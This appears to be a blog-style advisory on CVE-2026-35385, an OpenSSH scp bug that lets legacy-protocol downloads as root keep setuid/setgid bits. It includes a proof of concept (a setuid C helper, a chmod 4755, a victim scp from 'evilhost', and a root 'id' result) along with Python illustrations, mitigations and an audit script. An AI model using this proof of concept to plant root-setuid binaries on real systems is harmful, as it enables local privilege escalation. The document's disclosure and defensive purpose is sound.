A quietly dangerous flaw exists in versions of OpenSSH before 10.3, where a file downloaded over SCP as root with -O (Old protocol) and without -p (preserve mode) can end up with setuid or setgid bits set on the destination. This may allow unintentional privilege escalation, contrary to typical user expectations or intentions.

Introduction

OpenSSH’s scp utility is a time-honored tool for secure file transfers. However, for years, subtle surprises have lurked in rarely traveled code paths—such as when copying files as root using the legacy SCP protocol with certain flags. CVE-2026-35385 highlights one such issue: a logic bug that can cause a copied file to become setuid or setgid upon installation, potentially creating local privilege escalation risks.

This post gives a clear, technical explanation, a hands-on reproducible snippet, exploit details, and links to official references.

Vulnerability Details

CVE Number: CVE-2026-35385
Affected: OpenSSH < 10.3
Vulnerable Utility: scp
Scenario:

- The file is downloaded (copied from a remote server to local) as root
- -O is used (forces the old/legacy scp protocol)
- -p (preserve mode) is NOT used
- The remote side announces the file with setuid or setgid bits in its mode

Expected behavior: Without -p, the copied file should carry only ordinary permission bits; setuid/setgid should be dropped.
Actual behavior: The file may retain setuid/setgid bits upon copy, *even* without -p.

Why it's risky: In the legacy protocol the sender announces each file's mode, so an attacker who controls the remote server controls that mode. If a root user downloads the file with -O on a vulnerable client, the local copy is created by root (hence root-owned) with the setuid bit intact: a root-setuid binary whose contents the attacker chose.

Suppose you (attacker) control the remote server. Place a small setuid helper there. A shell script will not do: Linux ignores the setuid bit on interpreted scripts, so the payload has to be a compiled binary.

cat > /tmp/evil.c <<'EOF'
#include <unistd.h>
/* With euid 0 from the setuid bit, setuid(0) makes the real uid 0 too, then run id */
int main(void) { setuid(0); execl("/usr/bin/id", "id", (char *)0); return 1; }
EOF
cc -o /tmp/evil /tmp/evil.c
chmod 4755 /tmp/evil         # setuid bit ON; this is the mode scp will announce

Ownership on the attacker's side does not matter: the legacy protocol carries only the mode, and the victim's scp creates the local file as whoever runs it, here root.

Victim's action (unsafe scenario)

scp -O attacker@evilhost:/tmp/evil /usr/local/bin/evil

Check the file

ls -l /usr/local/bin/evil

Output could be (size and date will differ)

-rwsr-xr-x 1 root root 16384 Jun 16 08:26 /usr/local/bin/evil

rws shows the setuid bit is set: dangerously preserved.

Running it as any unprivileged local user

/usr/local/bin/evil
uid=0(root) gid=100(user) groups=100(user)

Why Did This Happen?

OpenSSH’s old scp protocol announces each regular file with a header that carries the file's mode in octal (C4755 followed by the size and name, in the example above). In pre-10.3 versions the receiving side handed that announced mode to file creation as-is, so whatever special bits the sender put in the header ended up on the local file, with or without -p. Most users expect -p to be the only way permissions are copied across, yet with -O the setuid/setgid bits "leak" from the sender's header regardless.

This is fixed in OpenSSH 10.3, where the scp receiver clears setuid/setgid on received files unless -p explicitly asks to preserve them.
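As an added illustration (this is not OpenSSH code), the following Python models the two behaviours side by side: it parses a legacy "C<mode> <size> <name>" header, which is the real shape of the protocol record, and then computes the mode a pre-10.3 receiver would create the file with versus a 10.3-style receiver. The function names, the umask modelling and the exact masking are this example's own; the sample header is constructed.

```python
"""
Toy model of how a legacy (-O) scp receiver turns the per-file
control record into a local file mode, pre-10.3 vs 10.3-style.
Added example, not OpenSSH source.

The legacy protocol announces a regular file as
    C<mode in octal> <size> <filename>\n
followed by <size> bytes of data.
"""
import re
import stat

# Constructed sample of what a hostile sender could emit for one file.
SAMPLE_RECORD = b"C4755 16384 evil\n"

# Four octal digits for the mode; the name may not contain '/' (the classic
# path-traversal trick against scp receivers) or a newline.
RECORD_RE = re.compile(rb"^C([0-7]{4}) (\d+) ([^\n/]+)\n$")

SPECIAL = stat.S_ISUID | stat.S_ISGID


def parse_c_record(record: bytes):
    """Split a 'C' record into (mode, size, name); rejects malformed input."""
    m = RECORD_RE.match(record)
    if not m:
        raise ValueError("malformed C record: %r" % record)
    return int(m.group(1), 8), int(m.group(2)), m.group(3).decode()


def legacy_create_mode(announced_mode: int, preserve: bool, umask: int = 0o022) -> int:
    """Pre-10.3 model: the announced mode is used as-is for file creation,
    so only the umask bits are dropped. Setuid/setgid survive whether or not
    preserve (-p) was requested. 'preserve' is accepted for symmetry only."""
    return announced_mode & ~umask & 0o7777


def fixed_create_mode(announced_mode: int, preserve: bool, umask: int = 0o022) -> int:
    """10.3-style model (this example's rendering of the fix): unless the
    caller asked to preserve permissions, setuid/setgid are cleared first."""
    mode = announced_mode
    if not preserve:
        mode &= ~SPECIAL
    return mode & ~umask & 0o7777


def has_special_bits(mode: int) -> bool:
    return bool(mode & SPECIAL)


def demo(record: bytes = SAMPLE_RECORD, preserve: bool = False):
    """Return (announced, legacy, fixed) modes for one record."""
    mode, _size, name = parse_c_record(record)
    old = legacy_create_mode(mode, preserve)
    new = fixed_create_mode(mode, preserve)
    print(f"{name}: announced {mode:05o}, legacy creates {old:05o}, "
          f"fixed creates {new:05o}")
    return mode, old, new


if __name__ == "__main__":
    demo()
```

Run without arguments it prints the 04755 / 04755 / 00755 triple for the sample record; the umask of 022 never touches the special bits, which is exactly why relying on the kernel's umask to sanitise an attacker-supplied mode is not enough.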

Mitigations

- Upgrade to OpenSSH 10.3 or later.
- Avoid -O when copying as root. scp has defaulted to the SFTP protocol since OpenSSH 9.0, and that path masks received permissions to the ordinary 0777 bits.
- If you must keep using the legacy protocol on an unpatched client, strip setuid/setgid manually after copying. scp has no option to force a destination mode, so the chmod is the only safeguard.

Example (SFTP protocol, plus a belt-and-braces chmod)

scp attacker@evilhost:/tmp/evil /usr/local/bin/evil
chmod u-s,g-s /usr/local/bin/evil
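For the check step, here is an added Python helper (not part of OpenSSH or this post's original material) that audits a directory tree for files carrying setuid or setgid and can strip those bits. It is the programmatic form of find DIR -perm /6000 followed by chmod u-s,g-s; the default target directory is an assumption for the example.

```python
"""
Post-copy audit: list regular files under a directory that carry setuid or
setgid, and optionally clear those bits. Added example, not OpenSSH code.
"""
import os
import stat
import sys

SPECIAL = stat.S_ISUID | stat.S_ISGID


def find_special_bit_files(root):
    """Return a sorted list of (path, permission_bits) for regular files
    under root with setuid or setgid set. Symlinks are not followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & SPECIAL:
                hits.append((p, stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def strip_special_bits(path):
    """Clear setuid/setgid on one file; returns the resulting permission bits."""
    st = os.lstat(path)
    new_mode = stat.S_IMODE(st.st_mode) & ~SPECIAL
    os.chmod(path, new_mode)
    return new_mode


if __name__ == "__main__":
    # Assumed default target for the example; pass a directory to override.
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/local/bin"
    fix = "--fix" in sys.argv
    for p, m in find_special_bit_files(target):
        print(f"{m:05o} {p}")
        if fix:
            print(f"  -> {strip_special_bits(p):05o}")
```

Running it right after an scp as root, before anything else has a chance to execute the copied file, turns the "check the file" step above into a repeatable control rather than an eyeball of ls output.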

References & Further Reading

- OpenSSH Release Notes (10.3)
- CVE-2026-35385 at MITRE
- Legacy SCP Protocol Security Risks
- Understanding Linux File Permissions: setuid and setgid

Final Thoughts

While this issue may seem esoteric, it illustrates the ongoing need to review all code paths—especially as root, and with legacy flags—in security-sensitive tools like OpenSSH. Always stay on top of release notes and patch quickly!

Timeline

Published on: 04/02/2026 16:30:59 UTC
Last modified on: 04/03/2026 16:10:23 UTC